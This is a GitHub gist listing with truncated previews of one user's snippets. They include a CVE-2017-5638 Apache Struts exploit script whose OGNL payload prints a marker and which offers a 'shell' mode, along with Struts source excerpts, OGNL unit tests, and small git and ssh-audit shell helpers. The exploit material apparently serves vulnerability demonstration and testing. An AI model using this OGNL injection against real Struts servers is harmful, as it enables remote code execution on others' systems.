SylvainJuge
SylvainJuge
/ cve-2017-5638.sh
Created
June 7, 2018 09:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| set -euo pipefail | |
| # write to output stream | |
| payload="(@java.lang.System@out.println('\\n\\n\\n---[ hello Sqreeners ]---'))" | |
| attack=${1:-hello} | |
| if [[ 'shell' == "${attack}" ]]; then |
SylvainJuge
/ TestOgnl.java
Last active
June 7, 2018 09:32
Struts 2.5.10 Ognl code execution with unit tests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package io.sqreen.sandbox; | |
| import com.opensymphony.xwork2.ActionContext; | |
| import com.opensymphony.xwork2.TextProvider; | |
| import com.opensymphony.xwork2.XWorkTestCase; | |
| import com.opensymphony.xwork2.conversion.impl.XWorkConverter; | |
| import com.opensymphony.xwork2.ognl.OgnlUtil; | |
| import com.opensymphony.xwork2.ognl.OgnlValueStack; | |
| import com.opensymphony.xwork2.ognl.accessor.CompoundRootAccessor; | |
| import com.opensymphony.xwork2.util.CompoundRoot; |
SylvainJuge
/ JakartaMultiPartRequest.java
Created
June 7, 2018 09:22
Struts 2.5.10 JakartaMultiPartRequest
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public void parse(HttpServletRequest request, String saveDir) throws IOException { | |
| try { | |
| setLocale(request); | |
| processUpload(request, saveDir); | |
| } catch (FileUploadException e) { | |
| LOG.warn("Request exceeded size limit!", e); | |
| LocalizedMessage errorMessage; | |
| if(e instanceof FileUploadBase.SizeLimitExceededException) { | |
| FileUploadBase.SizeLimitExceededException ex = (FileUploadBase.SizeLimitExceededException) e; | |
| errorMessage = buildErrorMessage(e, new Object[]{ex.getPermittedSize(), ex.getActualSize()}); |
SylvainJuge
/ FileUploadInterceptor.java
Created
June 7, 2018 09:18
Struts 2.5.10 FileUploadInterceptor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // intercept(...) method from Struts 2.5.10 | |
| // https://github.com/apache/struts/blob/f0f4e9ece77000e0eb0071bf233ed4b9bc9c8205/core/src/main/java/org/apache/struts2/interceptor/FileUploadInterceptor.java#L264 | |
| public String intercept(ActionInvocation invocation) throws Exception { | |
| ActionContext ac = invocation.getInvocationContext(); | |
| HttpServletRequest request = (HttpServletRequest) ac.get(ServletActionContext.HTTP_REQUEST); | |
| if (!(request instanceof MultiPartRequestWrapper)) { | |
| if (LOG.isDebugEnabled()) { |
SylvainJuge
/ git-add-bunny.sh
Last active
October 7, 2016 13:52
prevent your colleagues from using "git add ."
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # make your colleages stop using "git add ." | |
| # | |
| # you should put this into usual alias file .bashrc, .zshrc or whatever you use | |
| # - make sure path to git executable fits your setup (here on linux/ubuntu) | |
| # - increate timeout if symptoms persist | |
| git() { | |
| if [[ $@ == "add ." ]]; then | |
| echo "you shall use 'git add -p instead'" | |
| echo ' ,' | |
| echo ' /| __' |
SylvainJuge
/ git current branch
Created
March 23, 2015 12:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # 1) add function to add to your ~/.profile or ~/.bashrc (or aliases) file | |
| # | |
| _current_branch () { | |
| ref=$(git symbolic-ref HEAD 2>/dev/null) || head=$(git rev-parse --short HEAD 2>/dev/null) | |
| echo ${ref#refs/heads/} | |
| } |
SylvainJuge
/ sshaudit
Created
October 17, 2013 07:40
simple "ssh audit" to see ssh keys fingerprints authorized on multiple servers at once usage : sshaudit server1 server2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ssh "audit" : see who accesses what | |
| sshaudit (){ | |
| for server in "$@"; do | |
| ssh $server -C 'cat ~/.ssh/authorized_keys' | sort | while read line; do | |
| tmp="$(mktemp)" | |
| echo "$line" > "$tmp" | |
| echo $server $(ssh-keygen -lf "$tmp" | cut -d ' ' -f2,4) | |
| rm -f "$tmp" | |
| done | |
| done |